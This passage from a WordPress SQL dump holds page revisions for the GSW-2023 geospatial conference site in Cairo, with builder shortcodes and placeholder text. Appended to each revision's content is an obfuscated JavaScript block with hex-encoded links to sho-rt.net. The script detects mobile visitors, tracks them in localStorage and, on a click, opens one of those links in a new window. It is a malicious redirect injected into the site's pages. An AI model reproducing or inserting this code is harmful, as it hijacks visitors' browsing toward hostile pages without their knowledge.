|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:08:07','2022-11-08 23:08:07','',3066,'https://gsw2023.com/?p=3111',0,'revision','',0),
(3112,1,'2022-11-08 23:10:07','2022-11-08 23:10:07','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:10:07','2022-11-08 23:10:07','',3066,'https://gsw2023.com/?p=3112',0,'revision','',0),
(3113,1,'2022-11-08 23:10:42','2022-11-08 23:10:42','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 